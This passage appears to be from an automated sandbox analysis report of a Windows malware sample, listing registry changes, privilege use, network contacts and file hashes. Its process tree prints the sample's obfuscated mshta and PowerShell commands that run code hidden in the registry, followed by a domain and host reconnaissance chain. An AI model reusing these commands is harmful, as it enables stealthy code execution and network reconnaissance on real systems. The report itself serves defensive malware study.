| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000929baea5fcabd80198ab3da6fcabd80198ab3da6fcabd801f90407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000323236393033306539653632383732333338313234633561313335333033303362343861386632646533623861346564396431616431363230333033393162650000b20009000400efbe0955e0730955e0732e000000000000000000000000000000000000000000000000008f3d2300320032003600390030003300300065003900650036003200380037003200330033003800310032003400630035006100310033003500330030003300300033006200340038006100380066003200640065003300620038006100340065006400390064003100610064003100360032003000330030003300390031006200650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323639303330653965363238373233333831323463356131333533303330336234386138663264653362386134656439643161643136323033303339316265000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9185462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9185462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ffece5954ed7a6bf283d28ce3cccf569e240c3907c13f708593aa3c6bc89ccab" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = 5c1352a5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = bf2224a5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9c89f2bd41aee2ec830a66132c5645606c291cf54f900f2c9b92cc3650442eca" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000088abffa5fcabd801bc8055a6fcabd801bc8055a6fcabd801dd8d18000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346165346334336438616662356563393064353330373933363261636230303430356330353964326430303662323931653935343335623635393236313434330000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d6660b00340061006500340063003400330064003800610066006200350065006300390030006400350033003000370039003300360032006100630062003000300034003000350063003000350039006400320064003000300036006200320039003100650039003500340033003500620036003500390032003600310034003400330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34616534633433643861666235656339306435333037393336326163623030343035633035396432643030366232393165393534333562363539323631343433000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9385462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9385462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d7eecab9-6c40-413e-95 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a9cea0c2-7e1f-4d89-a5 | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\control.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"
C:\Windows\system32\control.exe
C:\Windows\system32\control.exe -h
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net view /all
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| NL | 79.110.52.8:80 | 79.110.52.8 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| NL | 79.110.52.82:80 | 79.110.52.82 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/1716-132-0x0000000000000000-mapping.dmp
memory/1716-133-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1716-138-0x0000000001F70000-0x0000000001F7D000-memory.dmp
memory/1520-142-0x0000000000000000-mapping.dmp
memory/1520-143-0x0000022E60900000-0x0000022E60922000-memory.dmp
memory/1520-144-0x00007FFE0C4A0000-0x00007FFE0CF61000-memory.dmp
memory/2812-145-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline
| MD5 | 6c9aa04fb876e079685966d995bdb398 |
| SHA1 | 5e75d849b04c782604dd2f7e8a7d61c590ad2fe7 |
| SHA256 | 9069a1f3043fd0eda2817ba12d85a529e4455af44d411f02bb131451bc50dce8 |
| SHA512 | 1161df029aaa506f94b45c1527d031361c189ad1bc3ca899bfcabd016aef5052dbedab3db0b2cd9c74dc90df0dd3c7e92f90df46d8b4695df9371f732fe9987b |
\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/3684-148-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP
| MD5 | 488518a0854dc8d2129d0e1623a37a6a |
| SHA1 | f5f381735a11d7b572f0f8617afc5ad69cef2cdd |
| SHA256 | babfdb1d940c0addee61aab483cf71ac5fead11352ae8baa0d980a3bdca8585c |
| SHA512 | 105f4f8ef0aa23ec4d6292f12f925563def203ad669aed110cda635903d721cf05ab39bd6a8d727c602d86ee515c79fe231ae46a5fd827228136f72889a6f329 |
C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp
| MD5 | 01f190bdaec04de221b7e23b41a74673 |
| SHA1 | 32023da04ece8010950b5fab4c491904eeadc205 |
| SHA256 | 9cdf726460c06e4331b7a20f0dec43563ccad65d5ff051ad22a0abc7c6688758 |
| SHA512 | 47d437eeb7252b7d11d15bba087c5b3bcc782115c642f8efc0fc582286c11717046fd96587cb8a704053a7c7ffa6f63aeb67d3283035e94e32671fc6fadf6bb9 |
C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.dll
| MD5 | 92be12bfb85cea8510497b97e1deb99a |
| SHA1 | 2ae7bc20bf614747a77b9aefb76ab15b3fb66e5f |
| SHA256 | 87d6faa6d06cf1ae59c4c5f969aacd6851b256916ac5a086a6f5ea87509e3700 |
| SHA512 | 079c54e47708c06ba73e7ada9bc305ff02493b1fdcd0fc614b8acd3b4f9473c90e3d7bbca67be83c668c9e88c87b7aed30e761dfbad835e6d1f810d29bd9d3ad |
memory/3736-152-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline
| MD5 | abe6a4f47746fa860e1827b2c160669a |
| SHA1 | b4dbfa0ea503c044b4111ab819346464e4f26845 |
| SHA256 | 6e99ca8c4c8a091392752e48beb56fe261b7e55e9d51c2904ef221ebf9e038b3 |
| SHA512 | ee7828e0ec18dfb5c2c5421a24021ac7fe81bda3dfbc288bd9a9043da41129ab4b1723f3dac58da79ab0c1d18f12947456944b1089679999cd6a16da62619f60 |
\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
